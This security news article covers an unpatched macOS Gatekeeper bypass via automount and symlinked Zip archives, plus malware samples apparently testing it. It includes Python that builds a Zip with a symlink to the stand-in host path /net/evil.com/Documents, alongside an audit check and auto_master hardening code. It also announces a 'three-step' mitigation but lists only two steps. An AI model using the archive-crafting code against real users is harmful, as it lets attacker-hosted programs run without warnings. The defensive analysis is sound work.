Cybersecurity researchers from Intego are warning about possible active exploitation of an unpatched security vulnerability in Apple’s macOS Gatekeeper security feature, details and a proof-of-concept for which were publicly disclosed late last month.
The Intego team last week discovered four samples of new macOS malware on VirusTotal that leverage the Gatekeeper bypass vulnerability to execute untrusted code on macOS without showing users any warning or asking for their explicit permission.
However, the newly discovered malware, dubbed OSX/Linker, has not been seen in the wild as of now and appears to be under development.
Though the samples leverage the unpatched Gatekeeper bypass flaw, they do not yet download any malicious app from the attacker’s server.
According to Joshua Long from Intego, until last week, the “malware maker was merely conducting some detection testing reconnaissance.”
“[Because] one of the files was signed with an Apple Developer ID, it is evident that the OSX/Linker disk images are the handiwork of the developers of the OSX/Surfbuyer adware,” Long said in a blog post.
However, since the samples link to a remote server from which the untrusted app is fetched, the attackers could distribute the very same disk images to real targets and simply swap the harmless test app on their server for a malicious one.
macOS Gatekeeper Bypass Vulnerability
Gatekeeper is a security feature built into macOS that enforces code signing and verifies downloaded applications before allowing them to run, helping protect users from malware and other malicious software.
In practice, when you download an application from the Internet, your browser tags it with a quarantine attribute, and on first launch Gatekeeper lets it run silently only if it is signed with a valid Apple-issued Developer ID certificate; otherwise it warns you and requires you to explicitly allow the execution. Files that never receive the quarantine tag, because they arrived some other way than a download, are not checked at all.
Proof of Concept
Filippo Cavallarin, an independent security researcher, late last month publicly revealed a way to bypass Gatekeeper by combining this behaviour with two other legitimate features of macOS.
The flaw is tied to Gatekeeper’s handling of external drives and network shares: both are treated as safe locations, so any application they contain is allowed to run without Gatekeeper’s checks or prompts, according to Cavallarin.
In his proof-of-concept attack he coupled that trust with two further features, automount and the way macOS extracts Zip archives containing symbolic links.
“The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a ‘special’ path, in this case, any path beginning with ‘/net/’. For example ls /net/evil-attacker.com/sharedfolder/ will make the OS read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS,” Cavallarin describes.
Next, the researcher points out that a Zip archive can contain “symbolic links pointing to an arbitrary location (including automount endpoints) and that the software on macOS that is responsible to decompress Zip files do[es] not perform any check on the symlinks before creating them.”
Symlinks, or symbolic links, are files that point to (or can be crafted to point to) files or directories elsewhere on the system; inside a Zip archive, a symlink entry’s data is simply the target path.
The attack therefore has the adversary build a specially crafted Zip archive containing a symbolic link to an automount endpoint under the attacker’s control, for example “Documents -> /net/evil.com/Documents”. When the victim extracts the archive and opens the link in Finder, macOS silently mounts the attacker’s NFS share and the victim is browsing it.
“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot,” Cavallarin wrote.
Cavallarin also posted a video demonstration of the vulnerability.
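The archive primitive described above, as an added example that is not Cavallarin’s PoC code: one function builds a Zip whose entry is a symlink to an automount path, and an audit function flags any symlink that escapes the archive root (automount, absolute or parent-traversal targets). The hostname evil.com and the link name “Documents” follow the advisory’s illustration; nothing is mounted or executed, the archive only lives in memory.

```python
"""Craft and audit Zip archives carrying symlinks, the primitive behind the Gatekeeper bypass.

Added example, not code from the advisory. Python's own extractor does not recreate
symlinks, but extractors that honour Unix mode bits (Info-ZIP unzip, macOS Archive
Utility) do, which is what the PoC relies on.
"""
import io
import posixpath
import stat
import zipfile
from typing import Dict, List, Optional, Tuple

# macOS autofs mounts any path under /net/<host>/ over NFS on first access (assumption:
# this is the only automount prefix we care about; the advisory only mentions /net).
AUTOMOUNT_PREFIXES = ("/net/",)


def build_symlink_zip(entries: Dict[str, str], symlinks: Dict[str, str]) -> bytes:
    """Return an in-memory Zip with regular `entries` (name -> content) and `symlinks` (name -> target).

    A symlink is stored like any other entry, except that the Unix mode in the high 16
    bits of external_attr says S_IFLNK and the entry's data is the link target path.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
        for name, target in symlinks.items():
            info = zipfile.ZipInfo(name)
            info.create_system = 3  # 3 = Unix, so extractors honour the mode bits
            info.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(info, target)
    return buf.getvalue()


def is_symlink(info: zipfile.ZipInfo) -> bool:
    """True if the entry's Unix mode marks it as a symbolic link."""
    return stat.S_ISLNK(info.external_attr >> 16)


def classify_target(target: str) -> Optional[str]:
    """Return why a symlink target is dangerous, or None if it stays inside the archive."""
    norm = posixpath.normpath(target)
    if any(norm == p.rstrip("/") or norm.startswith(p) for p in AUTOMOUNT_PREFIXES):
        return "automount"
    if norm.startswith("/"):
        return "absolute"
    if norm == ".." or norm.startswith("../"):
        return "traversal"
    return None


def audit_zip(zip_bytes: bytes) -> List[Tuple[str, str, str]]:
    """List (entry name, link target, reason) for every symlink that escapes the archive root."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_symlink(info):
                continue
            target = zf.read(info).decode("utf-8", "replace")
            reason = classify_target(target)
            if reason:
                findings.append((info.filename, target, reason))
    return findings


def demo() -> List[Tuple[str, str, str]]:
    """Constructed samples: the advisory's Documents link versus a harmless relative symlink."""
    malicious = build_symlink_zip(
        entries={"README.txt": "Open the Documents folder\n"},
        symlinks={"Documents": "/net/evil.com/Documents"},
    )
    benign = build_symlink_zip(
        entries={"app/bin/tool": "#!/bin/sh\necho ok\n"},
        symlinks={"app/tool": "bin/tool"},
    )
    assert audit_zip(benign) == []
    return audit_zip(malicious)


if __name__ == "__main__":
    for name, target, reason in demo():
        print(f"{reason}: {name} -> {target}")
```

The audit deliberately normalises the target before classifying it, so a link such as `/net/../etc` is still caught (as “absolute”) and `a/../../b` is reported as traversal; a mail gateway or endpoint agent can run the same check on attachments before Archive Utility ever sees them.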
Mitigation is fairly simple and amounts to disabling automount for the /net map. Cavallarin’s advisory gives a three-step process:
- “Edit /etc/auto_master as root”
- “Comment the line beginning with ‘/net’”
The technique was publicly disclosed late last month by Cavallarin, an independent security researcher, and the flaw remains unpatched.
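The edit the advisory describes, written up here as an added example (not code from the advisory) that works on the file’s text so it can be dry-run against a copy before touching /etc/auto_master as root. The sample map content is constructed to resemble the stock macOS file; the function only comments out active `/net` lines and leaves everything else, including lines that are already commented, untouched.

```python
"""Comment out the /net map in an auto_master file, the mitigation from Cavallarin's advisory.

Added example, not code from the advisory. Operates on text so it can be checked
against a copy before touching /etc/auto_master as root.
"""
import re
from typing import List, Tuple

# Constructed sample modelled on the stock macOS /etc/auto_master.
SAMPLE_AUTO_MASTER = """\
#
# Automounter master map
#
+auto_master\t\t# Use directory service
/net\t\t\t-hosts\t\t-nobrowse,hidefromfinder,nosuid
/home\t\t\tauto_home\t-nobrowse,hidefromfinder
/Network/Servers\t-fstab
/-\t\t\t-static
"""

# An active map line starts with its mount point; comment lines start with '#'
# and the directory-service include starts with '+', so neither matches.
ACTIVE_MAP = re.compile(r"^\s*(?P<mount>/\S*)(?:\s|$)")


def active_maps(text: str) -> List[str]:
    """Mount points of every uncommented map line, in file order."""
    maps = []
    for line in text.splitlines():
        m = ACTIVE_MAP.match(line)
        if m:
            maps.append(m.group("mount"))
    return maps


def disable_map(text: str, mount: str = "/net") -> Tuple[str, int]:
    """Return (new text, number of lines commented) with every active `mount` line commented out.

    Idempotent: a line that already begins with '#' does not match ACTIVE_MAP, so a
    second run reports zero changes.
    """
    out = []
    changed = 0
    for line in text.splitlines(keepends=True):
        m = ACTIVE_MAP.match(line)
        if m and m.group("mount") == mount:
            out.append("#" + line)
            changed += 1
        else:
            out.append(line)
    return "".join(out), changed


def demo() -> Tuple[List[str], List[str]]:
    """Active maps before and after hardening the constructed sample."""
    before = active_maps(SAMPLE_AUTO_MASTER)
    hardened, changed = disable_map(SAMPLE_AUTO_MASTER)
    assert changed == 1
    # Running it again changes nothing: the /net line is already commented.
    assert disable_map(hardened)[1] == 0
    return before, active_maps(hardened)


if __name__ == "__main__":
    before, after = demo()
    print("active maps before:", before)
    print("active maps after :", after)
    print(disable_map(SAMPLE_AUTO_MASTER)[0])
```

`active_maps` doubles as an audit: run it over /etc/auto_master on a fleet and any host still listing `/net` has the automount path open. The edit itself must be made as root, and autofs only picks it up once it re-reads its maps, for instance after a reboot.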